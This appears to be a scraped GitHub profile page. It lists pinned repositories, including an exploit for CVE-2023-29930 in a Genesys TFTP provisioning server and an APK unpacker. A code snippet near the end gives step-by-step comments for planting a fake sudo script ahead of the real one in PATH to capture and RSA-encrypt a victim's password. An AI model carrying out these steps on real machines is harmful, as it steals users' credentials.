We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.
You must be logged in to block users.
Contact GitHub support about this user’s behavior. Learn more about reporting abuse.
Easier more interesting Slackbots
Python 2
cliFFI: call native shared library functions right from your shell
C 6 1
Forked from quarkslab/legu_unpacker_2019
Scripts to unpack APK protected by Legu
Python 15 3
Info and exploit for CVE-2023-29930: blind file read/write in Genesys TFTP provisioning server configuration
Python 1
#!/bin/zsh
# Optionally use apfs-clonechecker to check for clones before recloning, useful if you are rerunning the script
export do_clone_check=${do_clone_check:-1}
export cleanup=${cleanup:-1}
#step 1: generate an rsa public/private keypair, and write your public key into the script below
#step 2: put this script onto the computer you are attacking, make it executable, and ensure it has higher PATH priority than real sudo
#step 3: after you obtain the encrypted password, decrypt it with cat .penc | openssl rsautl -decrypt -inkey your_key.priv
#note that you could easily modify to spoof other password taking utils like sudosh or su
There was an error while loading. Please reload this page.